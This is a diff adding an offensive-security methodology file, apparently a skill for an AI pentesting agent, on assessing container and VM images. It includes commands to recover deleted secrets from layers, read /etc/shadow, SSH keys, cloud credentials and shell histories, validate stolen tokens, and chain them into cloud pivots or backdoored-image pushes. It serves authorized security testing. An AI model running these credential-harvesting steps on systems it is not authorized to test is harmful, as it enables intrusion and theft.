+curl -sL "https://github.com/gitleaks/gitleaks/releases/download/${GLV}/gitleaks_${GLV#v}_linux_x64.tar.gz" | tar xz -C /usr/local/bin gitleaks
+# dive (interactive layer/efficiency inspection), skopeo (registry copy), dockle (CIS-ish image lint)
+apt-get update && apt-get install -y skopeo libguestfs-tools binwalk
+# VM/disk forensics
+apt-get install -y qemu-utils libguestfs-tools sleuthkit
+```
+
+Acquire the artifact without running it:
+
+```
+# Pull a registry image to a tarball WITHOUT a daemon (no execution)
+skopeo copy docker://registry.tld/ns/app:tag oci:./app-oci:tag
+skopeo inspect --config docker://registry.tld/ns/app:tag       # config/env/history, no pull of layers
+# Enumerate an exposed/private registry
+curl -s http://registry.tld:5000/v2/_catalog | jq .
+curl -s http://registry.tld:5000/v2/ns/app/tags/list | jq .
+nuclei -u http://registry.tld:5000 -tags docker,registry,exposure -silent
+```
+
+First-pass scans (run all three; they overlap but each catches what the others miss):
+
+```
+trivy image --input app.tar --scanners vuln,secret,misconfig --severity CRITICAL,HIGH,MEDIUM -f json -o trivy.json
+syft app.tar -o cyclonedx-json=sbom.json -o table          # full package inventory
+grype sbom:sbom.json -o table --fail-on high                # CVE match from the SBOM
+trufflehog docker --image file://app.tar --results=verified  # verified = live-checked credentials
+```
+
+## Methodology
+
+1. **Acquire inertly.** Get the tarball/disk via `skopeo copy`, `docker save`, or file transfer. Never `docker run` an untrusted image to inspect it — extract and read it on disk.
+2. **Read the metadata before the bytes.** Dump the config and per-layer history; inlined build secrets and entrypoint logic are visible without unpacking:
+   ```
+   tar -xf app.tar -C ./unpacked && jq . ./unpacked/manifest.json
+   skopeo inspect --config oci:./app-oci:tag | jq '.config.Env, .history[].created_by'
+   ```
+3. **Explode every layer, including deleted content.** Each `layer.tar` is a diff; whiteouts (`.wh.*`) hide but do not remove earlier data. Extract layers individually to recover "deleted" secrets:
+   ```
+   for L in $(jq -r '.[0].Layers[]' ./unpacked/manifest.json); do
+     mkdir -p "./layers/$(dirname $L)"; tar -xf "./unpacked/$L" -C "./layers/$(dirname $L)" 2>/dev/null; done
+   dive app.tar    # walk layers, spot the layer where a secret was added then "removed"
+   ```
+4. **CVE + SBOM pass.** `syft` → `grype` and `trivy` for OS and language deps. Prioritize CRITICAL/HIGH with a known exploit and a reachable runtime.
+5. **Secret sweep across the flattened tree and per-layer.** Run trufflehog (verified) + gitleaks + trivy secret over the unpacked filesystem, then again per layer to catch credentials that exist only in an intermediate layer.
+6. **Runtime config audit.** Inspect user, capabilities, setuid/setgid binaries, world-writable files, and entrypoint scripts.
+7. **For VM disks:** mount read-only and repeat steps 4–6 against the real root filesystem, plus shell history, cron, and `/etc/shadow`.
+8. **Validate, chain, report.** Verify each credential against its provider with read-only calls; map CVEs to a runnable PoC.
+
+## Key Weaknesses / Techniques
+
+**Secrets in layers and history (highest yield).** Credentials added in an early `RUN`/`COPY` and removed in a later layer remain fully recoverable. Always scan per-layer, not just the flattened image:
+
+```
+trufflehog docker --image file://app.tar --results=verified --json
+gitleaks dir ./layers --no-banner -f json -r gitleaks.json    # also catches embedded .git dirs
+grep -rIaE 'AKIA[0-9A-Z]{16}|ghp_[0-9A-Za-z]{36}|xox[baprs]-|-----BEGIN [A-Z ]*PRIVATE KEY-----' ./layers
+trivy image --input app.tar --scanners secret -f json | jq '.Results[].Secrets'
+```
+
+**Secrets in environment and entrypoint.** `Config.Env` and entrypoint scripts frequently carry DB URLs, API keys, and `*_TOKEN` values:
+
+```
+skopeo inspect --config oci:./app-oci:tag | jq -r '.config.Env[]' | grep -iE 'key|secret|token|pass|cred|url='
+jq -r '.history[].created_by' ./unpacked/*.json | grep -iE 'export|ARG|--password|token'
+```
+
+**Exploitable CVEs in base image / packages.** Outdated base images (`debian:10`, EOL `node:14`) and pinned-but-old libs map directly to CVEs. Confirm the vulnerable component is actually invoked at runtime before claiming impact:
+
+```
+grype app.tar -o json | jq '.matches[] | select(.vulnerability.severity=="Critical") | {pkg:.artifact.name, ver:.artifact.version, id:.vulnerability.id}'
+```
+
+**Runtime misconfiguration → escape/escalation.**
+- Runs as root (`Config.User` empty or `0`): combined with a privileged/`--cap-add` runtime this is a direct escape vector.
+- Unexpected setuid/setgid binaries in the image expand the post-exploitation surface.
+- World-writable files in `$PATH` or writable entrypoints allow tampering before execution.
+
+```
+skopeo inspect --config oci:./app-oci:tag | jq '.config.User'      # empty/"0"/"root" == runs as root
+find ./layers -perm -4000 -o -perm -2000 2>/dev/null               # setuid/setgid
+find ./layers -xdev \( -perm -0002 \) -type f 2>/dev/null | grep -E 'bin/|/etc/'
+dockle --input app.tar                                              # CIS-style image findings
+```
+
+**VM disk: mount read-only and harvest.** libguestfs mounts without booting the guest; never attach an untrusted disk to a running kernel via loopback without `ro`:
+
+```
+qemu-img info disk.qcow2                                            # format, virtual size, backing chain
+guestfish --ro -a disk.qcow2 -i                                    # interactive: cat, find, download
+# or non-interactive recursive secret scan:
+guestmount --ro -a disk.qcow2 -i /mnt/img && \
+  trufflehog filesystem /mnt/img --results=verified && \
+  trivy fs /mnt/img --scanners vuln,secret,misconfig
+# high-value paths once mounted:
+cat /mnt/img/etc/shadow; ls -la /mnt/img/root/.ssh /mnt/img/root/.aws /mnt/img/home/*/.config/gcloud
+grep -rIa . /mnt/img/root/.bash_history /mnt/img/home/*/.*_history 2>/dev/null
+binwalk -e /mnt/img/path/to/firmware.bin                            # embedded blobs in appliance images
+```
+
+## Validation
+
+1. **Secrets:** prove the credential is live and what it unlocks, with read-only provider calls. Do not mutate.
+   ```
+   AWS_ACCESS_KEY_ID=AKIA... AWS_SECRET_ACCESS_KEY=... aws sts get-caller-identity   # confirms valid + identity/scope
+   curl -s -H "Authorization: token ghp_..." https://api.github.com/user            # confirms PAT + account/scopes
+   ```
+   `trufflehog --results=verified` already performs this liveness check; record which layer/file the secret came from.
+2. **CVEs:** match the installed version to the advisory's affected range AND confirm the vulnerable code path is reachable (binary present, service started by entrypoint/systemd). Run a non-destructive PoC against an instance of the image where authorized.
+3. **Misconfig:** demonstrate the concrete consequence — e.g., start the image in the authorized lab and show `whoami` returns `root`, or that a world-writable entrypoint can be overwritten pre-exec.
+4. Capture the exact artifact digest (`sha256:...`) and layer index so the finding is reproducible against that specific image.
+
+## False Positives
+
+- **Example/placeholder secrets:** `AKIAIOSFODNN7EXAMPLE`, `changeme`, `password123`, docs/test fixtures. Verify liveness — unverified hits from gitleaks/trufflehog regex are candidates, not findings.
+- **CVEs in uninstalled or unreachable packages:** a vulnerable lib present in the SBOM but never loaded, or in a build-stage layer dropped from the final multi-stage image. Check the final layer set, not intermediate builders.
+- **Distroless/scratch noise:** version detectors misfire; confirm the package actually exists in the final image.
+- **Already-rotated credentials:** a secret recovered from an old layer that the provider now rejects — note it, but it is not exploitable.
+- **VM "deleted" files that are genuinely zeroed:** trimmed/zeroed sectors yield no recoverable data; do not report carved garbage.
+- **setuid binaries that are expected** (e.g., `sudo`, `ping`) — only unexpected or vulnerable-version setuid binaries matter.
+
+## Chaining & Impact
+
+- Leaked AWS/GCP/Azure key in a layer → `sts get-caller-identity` → enumerate IAM/storage → read other secrets → cloud account pivot.
+- Private SSH key + known host in `/root/.ssh` → direct access to production hosts the image was built to deploy.
+- Registry/CI token in `Config.Env` → push a backdoored image to the same registry → supply-chain compromise of every consumer.
+- Old base-image CVE (e.g., libc/openssl RCE) + image runs as root + privileged runtime → container escape to node → (with cluster creds also found in the image) cluster compromise. See the kubernetes skill for the post-escape path.
+- `.git` directory or `.npmrc`/`.pypirc` left in the image → source code disclosure or package-registry credential → further secret and dependency-confusion attacks.
+
+## Pro Tips
+
+1. The highest-value secrets are almost always in *intermediate* layers, not the flattened image. `dive` plus per-layer extraction beats scanning only the final filesystem.
+2. Run trufflehog with `--results=verified` first — it live-checks credentials, so you triage real findings instead of regex noise.
+3. `skopeo inspect --config` reads env, history, and entrypoint over the network without pulling gigabytes of layers — use it to triage many images fast.
+4. Multi-stage builds drop builder layers from the final image, but if the registry kept builder tags, pull those separately; that is where build secrets survive.
+5. For VM disks, always `--ro` / `guestfish --ro`; libguestfs runs the guest filesystem in isolation so you never boot untrusted code.
+6. Mismatched `Config.User` (empty) plus an entrypoint that `chmod`s or writes to `$PATH` is a tell for a tamperable runtime — confirm before the app starts.
+7. Cross-reference grype CVE output with the entrypoint: a CRITICAL in a package the entrypoint never invokes is lower priority than a HIGH in the running service.
+8. Shell history (`.bash_history`, `.zsh_history`) in VM images frequently contains plaintext passwords and one-liners with embedded tokens — grep it early.
+9. Keep the artifact digest in every note; "the image" is ambiguous once tags get repushed.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Cloud storage/registry/serverless/workspace asset types.

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/cloud/azure_blob.md`
- `strix/skills/cloud/cicd_pipeline.md`
- `strix/skills/cloud/container_image.md`
- `strix/skills/cloud/google_workspace.md`
- `strix/skills/cloud/microsoft_365.md`
- `strix/skills/cloud/s3_bucket.md`
- `strix/skills/cloud/serverless_function.md`
- `strix/skills/cloud/vm_image.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
